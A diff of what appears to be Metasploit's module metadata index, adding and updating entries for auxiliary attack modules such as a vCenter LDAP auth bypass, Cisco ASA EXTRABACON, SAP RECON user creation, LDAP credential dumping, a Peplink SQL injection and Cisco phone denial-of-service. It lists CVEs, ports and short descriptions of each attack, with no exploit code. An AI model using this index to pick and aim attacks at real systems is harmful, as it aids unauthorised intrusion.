@@ -4680,11 +4482,12 @@
    "disclosure_date": "2020-04-09",
    "type": "auxiliary",
    "author": [
+      "Hynek Petrak",
      "JJ Lehmann",
      "Ofri Ziv",
      "wvu <wvu@metasploit.com>"
    ],
-    "description": "This module bypasses LDAP authentication in VMware vCenter Server's\n          vmdir service to add an arbitrary administrator user. Version 6.7\n          prior to the 6.7U3f update is vulnerable.",
+    "description": "This module bypasses LDAP authentication in VMware vCenter Server's\n          vmdir service to add an arbitrary administrator user. Version 6.7\n          prior to the 6.7U3f update is vulnerable, only if upgraded from a\n          previous release line, such as 6.0 or 6.5.",
    "references": [
      "CVE-2020-3952",
      "URL-https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/",
@@ -4692,7 +4495,7 @@
    ],
    "platform": "",
    "arch": "",
-    "rport": 389,
+    "rport": 636,
    "autofilter_ports": [

    ],
@@ -4700,7 +4503,7 @@

    ],
    "targets": null,
-    "mod_time": "2020-05-21 21:01:52 +0000",
+    "mod_time": "2020-07-22 15:40:10 +0000",
    "path": "/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "admin/ldap/vmware_vcenter_vmdir_auth_bypass",
@@ -5750,6 +5553,453 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_admin/networking/arista_config": {
+    "name": "Arista Configuration Importer",
+    "fullname": "auxiliary/admin/networking/arista_config",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module imports an Arista device configuration.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 22,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-08-20 10:52:39 +0000",
+    "path": "/modules/auxiliary/admin/networking/arista_config.rb",
+    "is_install_path": true,
+    "ref_name": "admin/networking/arista_config",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "auxiliary_admin/networking/brocade_config": {
+    "name": "Brocade Configuration Importer",
+    "fullname": "auxiliary/admin/networking/brocade_config",
+    "aliases": [
+      "auxiliary/admin/brocade/brocade_config"
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module imports a Brocade device configuration.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 22,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-09-14 18:38:58 +0000",
+    "path": "/modules/auxiliary/admin/networking/brocade_config.rb",
+    "is_install_path": true,
+    "ref_name": "admin/networking/brocade_config",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "auxiliary_admin/networking/cisco_asa_extrabacon": {
+    "name": "Cisco ASA Authentication Bypass (EXTRABACON)",
+    "fullname": "auxiliary/admin/networking/cisco_asa_extrabacon",
+    "aliases": [
+      "auxiliary/admin/cisco/cisco_asa_extrabacon"
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Sean Dillon <sean.dillon@risksense.com>",
+      "Zachary Harding <zachary.harding@risksense.com>",
+      "Nate Caroe <nate.caroe@risksense.com>",
+      "Dylan Davis <dylan.davis@risksense.com>",
+      "William Webb <william_webb@rapid7.com>",
+      "Jeff Jarmoc <jjarmoc>",
+      "Equation Group",
+      "Shadow Brokers"
+    ],
+    "description": "This module patches the authentication functions of a Cisco ASA\n          to allow uncredentialed logins. Uses improved shellcode for payload.",
+    "references": [
+      "CVE-2016-6366",
+      "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp",
+      "URL-https://github.com/RiskSense-Ops/CVE-2016-6366"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 161,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-07-16 09:48:40 +0000",
+    "path": "/modules/auxiliary/admin/networking/cisco_asa_extrabacon.rb",
+    "is_install_path": true,
+    "ref_name": "admin/networking/cisco_asa_extrabacon",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "EXTRABACON"
+      ]
+    },
+    "needs_cleanup": false
+  },
+  "auxiliary_admin/networking/cisco_config": {
+    "name": "Cisco Configuration Importer",
+    "fullname": "auxiliary/admin/networking/cisco_config",
+    "aliases": [
+      "auxiliary/admin/cisco/cisco_config"
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module imports a Cisco IOS or NXOS device configuration.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 22,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-09-14 18:38:58 +0000",
+    "path": "/modules/auxiliary/admin/networking/cisco_config.rb",
+    "is_install_path": true,
+    "ref_name": "admin/networking/cisco_config",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "auxiliary_admin/networking/cisco_dcnm_download": {
+    "name": "Cisco Data Center Network Manager Unauthenticated File Download",
+    "fullname": "auxiliary/admin/networking/cisco_dcnm_download",
+    "aliases": [
+      "auxiliary/admin/cisco/cisco_dcnm_download"
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-06-26",
+    "type": "auxiliary",
+    "author": [
+      "Pedro Ribeiro <pedrib@gmail.com>"
+    ],
+    "description": "DCNM exposes a servlet to download files on /fm/downloadServlet.\n          An authenticated user can abuse this servlet to download arbitrary files as root by specifying\n          the full path of the file.\n          This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should\n          work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit\n          (see References to understand why).",
+    "references": [
+      "CVE-2019-1619",
+      "CVE-2019-1621",
+      "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass",
+      "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-file-dwnld",
+      "URL-https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_download.rb",
+      "URL-https://seclists.org/fulldisclosure/2019/Jul/7"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-06-22 06:11:11 +0000",
+    "path": "/modules/auxiliary/admin/networking/cisco_dcnm_download.rb",
+    "is_install_path": true,
+    "ref_name": "admin/networking/cisco_dcnm_download",
+    "check": false,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "auxiliary_admin/networking/cisco_secure_acs_bypass": {
+    "name": "Cisco Secure ACS Unauthorized Password Change",
+    "fullname": "auxiliary/admin/networking/cisco_secure_acs_bypass",
+    "aliases": [
+      "auxiliary/admin/cisco/cisco_secure_acs_bypass"
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Jason Kratzer <pyoor@flinkd.org>"
+    ],
+    "description": "This module exploits an authentication bypass issue which allows arbitrary\n          password change requests to be issued for any user in the local store.\n          Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well\n          as version 5.2 with either no patches or patches 1 and 2 are vulnerable.",
+    "references": [
+      "BID-47093",
+      "CVE-2011-0951",
+      "URL-http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-07-16 05:43:52 +0000",
+    "path": "/modules/auxiliary/admin/networking/cisco_secure_acs_bypass.rb",
+    "is_install_path": true,
+    "ref_name": "admin/networking/cisco_secure_acs_bypass",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "auxiliary_admin/networking/cisco_vpn_3000_ftp_bypass": {
+    "name": "Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access",
+    "fullname": "auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass",
+    "aliases": [
+      "auxiliary/admin/cisco/vpn_3000_ftp_bypass"
+    ],
+    "rank": 300,
+    "disclosure_date": "2006-08-23",
+    "type": "auxiliary",
+    "author": [
+      "aushack <patrick@osisecurity.com.au>"
+    ],
+    "description": "This module tests for a logic vulnerability in the Cisco VPN Concentrator\n          3000 series. It is possible to execute some FTP statements without authentication\n          (CWD, RNFR, MKD, RMD, SIZE, CDUP). It also appears to have some memory leak bugs\n          when working with CWD commands. This module simply creates an arbitrary directory,\n          verifies that the directory has been created, then deletes it and verifies deletion\n          to confirm the bug.",
+    "references": [
+      "BID-19680",
+      "CVE-2006-4313",
+      "OSVDB-28139",
+      "OSVDB-28138"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 21,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-07-16 05:43:52 +0000",
+    "path": "/modules/auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass.rb",
+    "is_install_path": true,
+    "ref_name": "admin/networking/cisco_vpn_3000_ftp_bypass",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "auxiliary_admin/networking/f5_config": {
+    "name": "F5 Configuration Importer",
+    "fullname": "auxiliary/admin/networking/f5_config",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module imports an F5 device configuration.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 22,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-08-25 16:17:37 +0000",
+    "path": "/modules/auxiliary/admin/networking/f5_config.rb",
+    "is_install_path": true,
+    "ref_name": "admin/networking/f5_config",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "auxiliary_admin/networking/juniper_config": {
+    "name": "Juniper Configuration Importer",
+    "fullname": "auxiliary/admin/networking/juniper_config",
+    "aliases": [
+      "auxiliary/admin/juniper/juniper_config"
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module imports a Juniper ScreenOS or JunOS device configuration.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 22,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-09-14 18:38:58 +0000",
+    "path": "/modules/auxiliary/admin/networking/juniper_config.rb",
+    "is_install_path": true,
+    "ref_name": "admin/networking/juniper_config",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "auxiliary_admin/networking/mikrotik_config": {
+    "name": "Mikrotik Configuration Importer",
+    "fullname": "auxiliary/admin/networking/mikrotik_config",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module imports a Mikrotik device configuration.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 22,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-08-19 07:46:55 +0000",
+    "path": "/modules/auxiliary/admin/networking/mikrotik_config.rb",
+    "is_install_path": true,
+    "ref_name": "admin/networking/mikrotik_config",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "auxiliary_admin/networking/ubiquiti_config": {
+    "name": "Ubiquiti Configuration Importer",
+    "fullname": "auxiliary/admin/networking/ubiquiti_config",
+    "aliases": [
+      "auxiliary/admin/ubiquiti/ubiquiti_config"
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module imports an Ubiquiti device configuration.\n          The db file within the .unf backup is the data file for\n          Unifi. This module can take either the db file or .unf.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 22,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-08-19 07:46:55 +0000",
+    "path": "/modules/auxiliary/admin/networking/ubiquiti_config.rb",
+    "is_install_path": true,
+    "ref_name": "admin/networking/ubiquiti_config",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_admin/officescan/tmlisten_traversal": {
    "name": "TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access",
    "fullname": "auxiliary/admin/officescan/tmlisten_traversal",
@@ -6396,6 +6646,60 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_admin/sap/cve_2020_6287_ws_add_user": {
+    "name": "SAP Unauthenticated WebService User Creation",
+    "fullname": "auxiliary/admin/sap/cve_2020_6287_ws_add_user",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-07-14",
+    "type": "auxiliary",
+    "author": [
+      "Pablo Artuso",
+      "Dmitry Chastuhin",
+      "Spencer McIntyre"
+    ],
+    "description": "This module leverages an unauthenticated web service to submit a job which will create a user with a specified\n          role. The job involves running a wizard. After the necessary action is taken, the job is canceled to avoid\n          unnecessary system changes.",
+    "references": [
+      "CVE-2020-6287",
+      "URL-https://github.com/chipik/SAP_RECON",
+      "URL-https://www.onapsis.com/recon-sap-cyber-security-vulnerability",
+      "URL-https://us-cert.cisa.gov/ncas/alerts/aa20-195a"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 50000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-07-23 18:10:07 +0000",
+    "path": "/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb",
+    "is_install_path": true,
+    "ref_name": "admin/sap/cve_2020_6287_ws_add_user",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "RECON"
+      ]
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_admin/sap/sap_configservlet_exec_noauth": {
    "name": "SAP ConfigServlet OS Command Execution",
    "fullname": "auxiliary/admin/sap/sap_configservlet_exec_noauth",
@@ -6961,7 +7265,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2017-11-09 03:00:24 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/auxiliary/admin/smb/check_dir_file.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/check_dir_file",
@@ -7000,7 +7304,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2020-06-11 13:09:25 +0000",
+    "mod_time": "2020-07-15 09:58:07 +0000",
    "path": "/modules/auxiliary/admin/smb/delete_file.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/delete_file",
@@ -7039,7 +7343,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2020-06-11 13:09:25 +0000",
+    "mod_time": "2020-07-15 09:58:07 +0000",
    "path": "/modules/auxiliary/admin/smb/download_file.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/download_file",
@@ -7079,7 +7383,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/auxiliary/admin/smb/list_directory.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/list_directory",
@@ -7127,7 +7431,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2020-05-30 10:27:48 +0000",
+    "mod_time": "2020-07-06 10:33:03 +0000",
    "path": "/modules/auxiliary/admin/smb/ms17_010_command.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/ms17_010_command",
@@ -7176,7 +7480,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2020-05-30 10:27:48 +0000",
+    "mod_time": "2020-07-06 10:25:38 +0000",
    "path": "/modules/auxiliary/admin/smb/psexec_command.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/psexec_command",
@@ -7258,7 +7562,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2018-07-12 17:34:52 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/auxiliary/admin/smb/samba_symlink_traversal.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/samba_symlink_traversal",
@@ -7297,7 +7601,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2020-06-11 13:09:25 +0000",
+    "mod_time": "2020-07-15 09:58:07 +0000",
    "path": "/modules/auxiliary/admin/smb/upload_file.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/upload_file",
@@ -7517,43 +7821,6 @@
    },
    "needs_cleanup": false
  },
-  "auxiliary_admin/ubiquiti/ubiquiti_config": {
-    "name": "Ubiquiti Configuration Importer",
-    "fullname": "auxiliary/admin/ubiquiti/ubiquiti_config",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "h00die"
-    ],
-    "description": "This module imports an Ubiquiti device configuration.\n        The db file within the .unf backup is the data file for\n        Unifi. This module can take either the db file or .unf.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": 22,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2020-03-21 11:00:25 +0000",
-    "path": "/modules/auxiliary/admin/ubiquiti/ubiquiti_config.rb",
-    "is_install_path": true,
-    "ref_name": "admin/ubiquiti/ubiquiti_config",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
  "auxiliary_admin/upnp/soap_portmapping": {
    "name": "UPnP IGD SOAP Port Mapping Utility",
    "fullname": "auxiliary/admin/upnp/soap_portmapping",
@@ -8800,6 +9067,43 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_client/telegram/send_message": {
+    "name": "Telegram Message Client",
+    "fullname": "auxiliary/client/telegram/send_message",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Ege Balcı <egebalci@pm.me>"
+    ],
+    "description": "This module will send a Telegram message to given chat ID with the\n            given bot token. Please refer to the module documentation for info\n            on how to retrieve the bot token and corresponding chat ID values.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-07-28 16:14:29 +0000",
+    "path": "/modules/auxiliary/client/telegram/send_message.rb",
+    "is_install_path": true,
+    "ref_name": "client/telegram/send_message",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_cloud/aws/enum_ec2": {
    "name": "Amazon Web Services EC2 instance enumeration",
    "fullname": "auxiliary/cloud/aws/enum_ec2",
@@ -9063,6 +9367,82 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_dos/cisco/cisco_7937g_dos": {
+    "name": "Cisco 7937G Denial-of-Service Attack",
+    "fullname": "auxiliary/dos/cisco/cisco_7937g_dos",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-06-02",
+    "type": "auxiliary",
+    "author": [
+      "Cody Martin"
+    ],
+    "description": "This module exploits a bug in how the conference station \n\thandles incoming SSH connections that provide an incompatible \n\tkey exchange. By connecting with an incompatible key exchange, \n\tthe device becomes nonresponsive until it is manually power\n\tcycled.",
+    "references": [
+      "URL-https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/",
+      "CVE-2020-16138"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-08-21 13:13:33 +0000",
+    "path": "/modules/auxiliary/dos/cisco/cisco_7937g_dos.py",
+    "is_install_path": true,
+    "ref_name": "dos/cisco/cisco_7937g_dos",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "auxiliary_dos/cisco/cisco_7937g_dos_reboot": {
+    "name": "Cisco 7937G Denial-of-Service Reboot Attack",
+    "fullname": "auxiliary/dos/cisco/cisco_7937g_dos_reboot",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-06-02",
+    "type": "auxiliary",
+    "author": [
+      "Cody Martin"
+    ],
+    "description": "This module exploits a bug in how the conference station handles \n\texecuting a ping via its web interface. By repeatedly executing \n\tthe ping function without clearing out the resulting output, \n\ta DoS is caused that will reset the device after a few minutes.",
+    "references": [
+      "URL-https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/",
+      "CVE-2020-16139"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-08-21 09:01:45 +0000",
+    "path": "/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.py",
+    "is_install_path": true,
+    "ref_name": "dos/cisco/cisco_7937g_dos_reboot",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_dos/cisco/ios_http_percentpercent": {
    "name": "Cisco IOS HTTP GET /%% Request Denial of Service",
    "fullname": "auxiliary/dos/cisco/ios_http_percentpercent",
@@ -11322,7 +11702,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb",
    "is_install_path": true,
    "ref_name": "dos/samba/read_nttrans_ea_list",
@@ -12909,7 +13289,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2020-05-12 22:15:21 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb",
    "is_install_path": true,
    "ref_name": "dos/windows/smb/ms06_035_mailslot",
@@ -12951,7 +13331,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb",
    "is_install_path": true,
    "ref_name": "dos/windows/smb/ms06_063_trans",
@@ -12993,7 +13373,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/auxiliary/dos/windows/smb/ms09_001_write.rb",
    "is_install_path": true,
    "ref_name": "dos/windows/smb/ms09_001_write",
@@ -13158,7 +13538,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb",
    "is_install_path": true,
    "ref_name": "dos/windows/smb/ms10_054_queryfs_pool_overflow",
@@ -14100,7 +14480,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb",
    "is_install_path": true,
    "ref_name": "fuzzers/smb/smb_create_pipe_corrupt",
@@ -14176,7 +14556,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-07 20:22:56 +0000",
    "path": "/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb",
    "is_install_path": true,
    "ref_name": "fuzzers/smb/smb_ntlm1_login_corrupt",
@@ -14254,7 +14634,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb",
    "is_install_path": true,
    "ref_name": "fuzzers/smb/smb_tree_connect_corrupt",
@@ -16044,7 +16424,7 @@
      "dns"
    ],
    "targets": null,
-    "mod_time": "2020-05-06 10:38:11 +0000",
+    "mod_time": "2020-08-10 16:31:11 +0000",
    "path": "/modules/auxiliary/gather/enum_dns.rb",
    "is_install_path": true,
    "ref_name": "gather/enum_dns",
@@ -17226,6 +17606,50 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_gather/ldap_hashdump": {
+    "name": "LDAP Information Disclosure",
+    "fullname": "auxiliary/gather/ldap_hashdump",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-07-23",
+    "type": "auxiliary",
+    "author": [
+      "Hynek Petrak"
+    ],
+    "description": "This module uses an anonymous-bind LDAP connection to dump data from\n          an LDAP server. Searching for attributes with user credentials\n          (e.g. userPassword).",
+    "references": [
+      "CVE-2020-3952",
+      "URL-https://www.vmware.com/security/advisories/VMSA-2020-0006.html"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 636,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-08-27 09:14:51 +0000",
+    "path": "/modules/auxiliary/gather/ldap_hashdump.rb",
+    "is_install_path": true,
+    "ref_name": "gather/ldap_hashdump",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_gather/mantisbt_admin_sqli": {
    "name": "MantisBT Admin SQL Injection Arbitrary File Read",
    "fullname": "auxiliary/gather/mantisbt_admin_sqli",
@@ -17611,7 +18035,7 @@

    ],
    "targets": null,
-    "mod_time": "2020-01-16 14:21:09 +0000",
+    "mod_time": "2020-08-14 13:11:38 +0000",
    "path": "/modules/auxiliary/gather/nis_bootparamd_domain.rb",
    "is_install_path": true,
    "ref_name": "gather/nis_bootparamd_domain",
@@ -17836,6 +18260,55 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_gather/peplink_bauth_sqli": {
+    "name": "Peplink Balance routers SQLi",
+    "fullname": "auxiliary/gather/peplink_bauth_sqli",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "X41 D-Sec GmbH <info@x41-dsec.de>",
+      "Redouane NIBOUCHA <rniboucha@yahoo.fr>"
+    ],
+    "description": "Firmware versions up to 7.0.0-build1904 of Peplink Balance routers are affected by an unauthenticated\n          SQL injection vulnerability in the bauth cookie, successful exploitation of the vulnerability allows an\n          attacker to retrieve the cookies of authenticated users, bypassing the web portal authentication.\n\n          By default, a session expires 4 hours after login (the setting can be changed by the admin), for this\n          reason, the module attempts to retrieve the most recently created sessions.",
+    "references": [
+      "EDB-42130",
+      "CVE-2017-8835",
+      "URL-https://gist.github.com/red0xff/c4511d2f427efcb8b018534704e9607a"
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-09-02 20:19:03 +0000",
+    "path": "/modules/auxiliary/gather/peplink_bauth_sqli.rb",
+    "is_install_path": true,
+    "ref_name": "gather/peplink_bauth_sqli",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_gather/pimcore_creds_sqli": {
    "name": "Pimcore Gather Credentials via SQL Injection",
    "fullname": "auxiliary/gather/pimcore_creds_sqli",
@@ -18383,13 +18856,22 @@
    "arch": "",
    "rport": null,
    "autofilter_ports": [
-
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
    ],
    "autofilter_services": [
-
+      "http",
+      "https"
    ],
    "targets": null,
-    "mod_time": "2020-06-17 14:22:07 +0000",
+    "mod_time": "2020-07-20 17:57:55 +0000",
